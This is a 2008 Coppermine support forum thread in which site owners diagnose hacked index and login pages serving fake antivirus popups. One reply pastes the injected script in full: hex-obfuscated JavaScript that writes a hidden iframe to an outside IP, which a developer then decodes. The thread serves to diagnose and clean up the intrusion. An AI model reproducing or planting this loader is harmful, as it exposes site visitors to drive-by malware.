Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: 1.4.18 (Stable) SQL Injection issue. (I think)  (Read 4403 times)

0 Members and 1 Guest are viewing this topic.

adam1942

  • Coppermine newbie
  • Offline Offline
  • Posts: 6
1.4.18 (Stable) SQL Injection issue. (I think)
« on: June 11, 2008, 11:45:36 pm »

Folks,

I installed the version 1.4.14 of coppermine threw fantisco, I then upgraded stright away (within 5 minutes) of using 1.4.14. the gallery has been known to the public for about 1 day / 1 and a half days and ive already had an SQL injection(I think) which is loading crap from advancedxpdefender.xxxxx. Has anyone else had this? I cannot find how to remove it as i cannot find anything in the SQL database linking to advancedxpdefender. is there any specific files i should be checking on the FTP?

ADam.
Logged

adam1942

  • Coppermine newbie
  • Offline Offline
  • Posts: 6
Re: 1.4.18 (Stable) SQL Injection issue. (I think)
« Reply #1 on: June 11, 2008, 11:46:43 pm »

er thats suppost to say I upgraded to 1.4.18 sorry!
Logged

Nibbler

  • Guest
Re: 1.4.18 (Stable) SQL Injection issue. (I think)
« Reply #2 on: June 11, 2008, 11:49:36 pm »

Check for any files modified since you made the update. If you just installed then you can just upload clean copies of all the files. What makes you think it's SQL injection? Do you have a log file that indicates this?
Logged

adam1942

  • Coppermine newbie
  • Offline Offline
  • Posts: 6
Re: 1.4.18 (Stable) SQL Injection issue. (I think)
« Reply #3 on: June 11, 2008, 11:52:07 pm »

nope but no one else has access to the FTP to access any file.. all perms should be set right. I had an SQL injection before on a forum and it loaded excactly the same way which is whats making me think its a SQL injection, I will check for files that are modded and get back to you.
Logged

adam1942

  • Coppermine newbie
  • Offline Offline
  • Posts: 6
Re: 1.4.18 (Stable) SQL Injection issue. (I think)
« Reply #4 on: June 11, 2008, 11:58:16 pm »

ok fella, found out that index.php and login.php had been edited today. the worrying thing is that NO one has access to the FTP and the password is numbers/letters and chactures. Any ideas?
Logged

adam1942

  • Coppermine newbie
  • Offline Offline
  • Posts: 6
Re: 1.4.18 (Stable) SQL Injection issue. (I think)
« Reply #5 on: June 11, 2008, 11:58:52 pm »

ive also taken a backup of them if you wish to see the infected/modified file.
Logged

adam1942

  • Coppermine newbie
  • Offline Offline
  • Posts: 6
Re: 1.4.18 (Stable) SQL Injection issue. (I think)
« Reply #6 on: June 12, 2008, 01:01:31 am »

just found out every index.php/index.html/login.php has been changed on my server. This is webhosting so i think maybe the whole box was attacked! ooops :(
Logged

wurst

  • Coppermine newbie
  • Offline Offline
  • Posts: 2
Re: 1.4.18 (Stable) SQL Injection issue. (I think)
« Reply #7 on: June 13, 2008, 12:52:14 am »

i was looking for this curious incident and so i found this page. i think it has nothing to do especially with coppermine. i design a few pages on different hosters and i have exact these situation: a lot of, (not every) index.php/html/htm files have this javascript tag:

Code: [Select]
script>
<!--
var d=document,kol=561;
function O10H4851354BB6EB1(H4851354BB76AA){ var H4851354BB7EAB = 16; return( parseInt(H4851354BB76AA,H4851354BB7EAB));}function H4851354BB8E94(H4851354BB968D){ var H4851354BBAE91 = 2; var H4851354BB9E9A='';for(H4851354BBA67D=0; H4851354BBA67D<H4851354BB968D.length; H4851354BBA67D+=H4851354BBAE91){ H4851354BB9E9A += ( String.fromCharCode (O10H4851354BB6EB1(H4851354BB968D.substr(H4851354BBA67D, H4851354BBAE91))));}return H4851354BB9E9A;} document.write(H4851354BB8E94('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3130373031292B27353937375C272077696474683D323631206865696768743D3431207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>

my suspicion is, that i had installed a worm or eventually an injection software on my local pc, that read all my ftp logins and write this javascript tag to all index files!
i saw in the status bar of my browser that advancedxpdefender.com and 77.221.133.198 (russia) was loading. when i left the page or closed the window, a popup appeared, with a warning, that my pc isnt protected and i should go to advancedxp, no i dont write this f...... domain name anymore.

now i reinstalled my os and it seems to work as well...
Logged

SaWey

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 1119
    • SaWey.be
Re: 1.4.18 (Stable) SQL Injection issue. (I think)
« Reply #8 on: June 13, 2008, 01:18:06 am »

yes, this code, when evaluated, looks likethis:
Code: [Select]
<SCRIPT>
window.status='Done';
document.write('<iframe name=[random_nr] src=\'http://77.221.X.X/.if/go.html?'+Math.round(Math.random()*[random_nr])+'[random_nr]\'width=303 height=93  style=\'display: none\'></iframe>')
</SCRIPT>
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: 1.4.18 (Stable) SQL Injection issue. (I think)
« Reply #9 on: June 13, 2008, 08:07:07 am »

not a case of sql injection though as far as I can tell. Seems like you have fallen victim to a similar hack as the one discussed in http://forum.coppermine-gallery.net/index.php/topic,51671.0.html
A copycat may have changed the workload of the hack, but probably is using the same attack pattern. Therefore, do as suggested in http://forum.coppermine-gallery.net/index.php/topic,51927.0.html
Logged

wurst

  • Coppermine newbie
  • Offline Offline
  • Posts: 2
Re: 1.4.18 (Stable) SQL Injection issue. (I think)
« Reply #10 on: June 13, 2008, 12:49:20 pm »

i recommend to change ALL your passwords from a clean machine. i changed all but one ftp account, and this one is continued with attacks with said javascript code. so the attacks dont come from the one machine but from extern. my hoster said that ftp actions came from 77.221.....
Logged
Pages: [1]   Go Up
 

Page created in 0.019 seconds with 21 queries.